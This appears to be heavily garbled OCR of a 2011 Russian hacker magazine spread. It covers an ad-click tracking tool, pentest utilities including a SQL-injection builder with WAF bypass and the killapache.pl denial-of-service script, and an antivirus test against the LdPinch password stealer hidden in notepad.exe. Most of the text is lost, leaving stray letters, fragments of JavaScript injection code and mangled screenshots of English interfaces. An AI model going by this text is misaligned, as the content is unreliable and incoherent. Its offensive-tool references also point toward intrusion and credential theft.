document.get ElementsByTagName( "head" ) [ e). appendChild(script);
n , n , n .
n n : n , n ,
- n. n n, n . , IP n
n n n [ n n n , - ),
. n . n, SpyBox
: n n n [ 1000 ), n [ n , n , ,
n ) .
ADWATCHER SpyBox, , , . , n
, , ? Adwatcher, , SpyBox,
!
, ,
nn . , ! 2003 n , n Google 150 . , n, n
, Google Clique , n Google . , Google n,
n . , n, . , , n
2009 . Microsoft , , n Microsoft. 750 . - . , ,
.
12/155/2011
www.epidemz.net
Campaign :
Search Engine:
Group:
Landing Page:
Cost :
[x akep campaign n.ame is us~ to identify this particular ad in your reports. ihe nam e is limited in l~ngth to 32 chactl!rS ilnd numbers. For vcamplt!, an ild
in "Bob' s Monthly Ne\vslette r'' could bl! named "Bobs Ne\vs",
1 Google AdWords Selec t the sea rch eng:ine that you plan to use this 1cking link '1\ith.
L:t"=est"'------------'--'-' :: Create Grouo AdW.atch e al lo\vs you to organi ze your campiligns in different gou p s, so tha t you Cil n com pare and contrast ho\v each group parfo rms its \\'. 1/Ja
highly recommend that you use this feature , as it will help you get the most
out or th e s tatistics and reports in the lo ng run. If you do not curre.ntly h011ve: iiY groups created, or "ish to creJte differen t group, you cn Si!t one up
c:licking on "Crei te Group", The group you set up \\;11 iutomiticilly ippeir in the dropdo\vn menu \\'hti!n yo u itl! c rtta t ing yo ur next campaign.
If you Ciln nat . t ~nding Page Field or receive distribution error l make s that your rowser t.s JavScript ~bled.
Enter the URL of the \\' page you want to send your visitors to aft:er clicki ng t he idv&rtisement. This la nding paga either your
homepage or spa cial pigtt you have Sti!t up speciAca11y for thos e visitors.
Vou miy en ter multiple landing pages and th e percentage of traffi c you wish
to sent to each one of them to te.st \\'hi ch one converts better to sales or
actions. See ouffeatures page for more details.
~ Per Click GJ Select the type of the campiign; that is, \\lhether it 's Per Cli ck, Aat
fee. mon thly ite , e tc. This select ion is needed for eilculting your future expenses.
xakep.ru
. - [ IP) [ , , , , , ).
[ ) 3D- . , faud ts ,
. ,
, [ , ) :
document.write( ' ' );
, . Adwatche 30
. , , ,
, Adwatche SpyBox.
12/155/2011
: AdSense
Q.ulc:kNo~viptlon
> newco~mplicn
Welcome to AdWatcher Oashoard Welcome Demo. Today you h~Ve recefved: 110 clkks, actions, d Oles.
> oveMew reporb >nlturo~treports
> financio~lrepots > fro~udreports
;.!\~. 9.~! .Q!fiC)~ ~!!IJ. Q~!d.ll! .I?!P..~!!~~'!C:.~!'!'~!~t-.11.
General lnformat ion
'~tiiCim~lls" = Hul N1ntr1l Clm~;n 7ot11Frludll.por.s
- Adwatcher
19
36
Octoer Stat istics: (12) Cliclui : (2) A.ctions :
{45) SJI :
Polit:
t...A..NLJIA 68,42 "!
(7676] JJ
[] (6312.28 ]
(0.00] {6312.28]
{100]
__ 00:03:18 .
, Google Analytics
, : Google Analyti cs Piwik [ -, ). , ,
, . : , ,
. , ,
[ 40 , ), ,
. > . ,
. , , -
. , - . ,
, .
, [ , ) .
,
. , , , , , :). I
081
www.epidemz.net
Mar licq 884888, http://snipper.rul
amw.. II HOII. I.I!O.If t-.ol ... o I.IIO::OIL:I:O.tt
n-- ......... __
D-1t.1 .............. I . ..,...W IOI0101l,IIO!, >,
ei'O------. . ~ . ..__....,, .... _.... _ .. -.
-------
-
1 -~~==:~ -----.........
: 54luR4
URL: il lylpxtMKi
: 'nix/win
: Gremwell
URL: www gremwell com
: nix/win
- , n , ,
m? n ? ,
MagicTee. n n n .
IWAF, Acuetix, OpeVAS, Nessus, u, m . .), n n
!n, m ikto) IHTML, MS Wod .) .
!) ,
, Magic !)- n n , n
n ,
. n n ,
n n , www.gemwell . com/ documetatio .
12/155/2011
ALANA K!LLR , n
- Apache l bit.ly/gvHB i ), , n . n
n , n , n
t l K!LLR
S4luR4 n n -. n n , n
n. , n
: Danijel MaXoNe URL:
it ly/orsgKn
: Windows 2000/
/2003 Server/ Vista/2008 Server/7
/
n/- / n SQL-oa, n MaxSQLi Sytax Builde, n SQL-. n SQLi,
n based. :
; n
UNION; WAF n ;
; ;
n ;
n; , ;
n stig itege based.
, n , n , , n ,
n SQL-.
X-Tools
killapache.pl Kigcope. n -- , n
. S4luR4 + cURL l , n !, , . .).
: G-
lbyte gs) , n n.
: VaZoNeZ
URL: yazonez com/(;lage/
-- --
.llig.an.Q -t~
: Windows 2000//2003 Server/ Vista/2008 Server/7
n , n ,
. , ,
n . nn n Stegao, .
n , : 1.
-
. , ,
- ,
. - .
notepad2.exe J
" w n "0-m - ~ ~1*1
Kpaw
, , . , - , -. ;1.
, -. n
, . .
, , ,
-, . .
, , . ,
. ,
.
1. Kaspersky Crystal . . Kaspesky Cystal-
-
- - i" Dr Web Scanner FLY-CODE, , , .
3. ESET NOD32 Smart Security 5. - ESET NOD32 Smat Secuity 5. ,
.. , , >,
. 4. Avast! Free Antivirus.
- Avast! F Antivius. n, ,
.
n n
. , . - n .
, n n n .
n. n , API, n
, n , .
,
n LL-. , ,
. , .
Pinch. - ,
. Toja-PSW.Wi32.LDPinch.dlt, D. Web- Tojan.Packed . 1197, NOD32- Win32/PSW.LdPinch.NMJ, Avast , Win32:LdPinch-NO [j]. ,
n otepad.exe. , .
ii:Wi~ .
MZ- -, . - - otepad.exe. - , ,
I- .
Kaspesky Cistal. - . > . NOD32 Smat Secuity , Win32/PSW.LdPinch.NMJ.
Avast , , .